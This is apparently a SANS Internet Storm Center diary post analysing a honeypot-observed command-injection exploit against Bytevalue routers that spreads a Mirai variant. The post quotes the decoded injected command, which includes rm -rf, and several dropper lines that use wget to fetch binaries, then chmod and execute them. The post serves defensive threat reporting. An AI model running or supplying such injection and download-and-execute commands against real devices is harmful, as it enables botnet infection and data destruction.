Exploit against Unnamed "Bytevalue" router vulnerability included in Mirai Bot

Published: 2024-02-12
Last Updated: 2024-02-12 14:11:55 UTC
by Johannes Ullrich (Version: 1)
0 comment(s)

Today, I noticed the following URL showing up in our "First Seen" list:


Initially, our sensors detected requests for just "goform/webRead/open". 


screen shot of bytevalue login page
Bytevalue Login page from bytevalue.com

URLs containing "goform" are typically associated with the RealTek SDK. Routers built around the RealTek SoC (System on a Chip) usually use the SDK to implement web-based access tools. The RealTek SDK had numerous vulnerabilities in the past. We currently track over 900 unique URLs in our honeypots using a "/goform/" URL. The most popular URL is usually "goform/set_LimitClient_cfg", associated with CVE-2023-26801 in LB-Link routers. But simple password brute force attacks are also common, taking advantage of default passwords.


So far, I have not been able to identify a specific CVE number for vulnerabilities related to  "goform/webRead/open". However, a Chinese blog post from November [1] suggests that this is related to a vulnerability in routers made by the Chinese company "BYTEVALUE." I could not find a patch for the vulnerability.

The exploit attempt In the URL above follows the standard command injection pattern. URL decode leads to:

rm -rf *; cd /tmp; wget; chmod 777 bruh.sh; ./bruh.sh

With "bruh.sh" being the typical shell script downloading the next stage for various architectures:

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lol; chmod +x lol; ./lol 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O lmao; chmod +x lmao; ./lmao 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kekw; chmod +x kekw; ./kekw 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O what; chmod +x what; ./what 0day_router
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O kys; chmod +x kys; ./kys 0day_router
[I removed various versions that used offensive filenames]

The binary is simply UPX-packed. The binary contains strings pointing to other router exploits and paths in "/home/landley/", which may indicate the system the binary was compiled on.

Virustotal did not have a sample yet when I uploaded mine [2]. However, the sample is well recognized as a "Mirai" variant that appears correct.

[1] https://blog.csdn.net/zkaqlaoniao/article/details/134328873
[2] https://www.virustotal.com/gui/file/0d0f841ff15c3a01e5376ec7453c2465ec87a9450a21053c3ab4fcb9bbbe1605?nocache=1

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu

0 comment(s)
ISC Stormcast For Monday, February 12th, 2024 https://isc.sans.edu/podcastdetail/8848


Diary Archives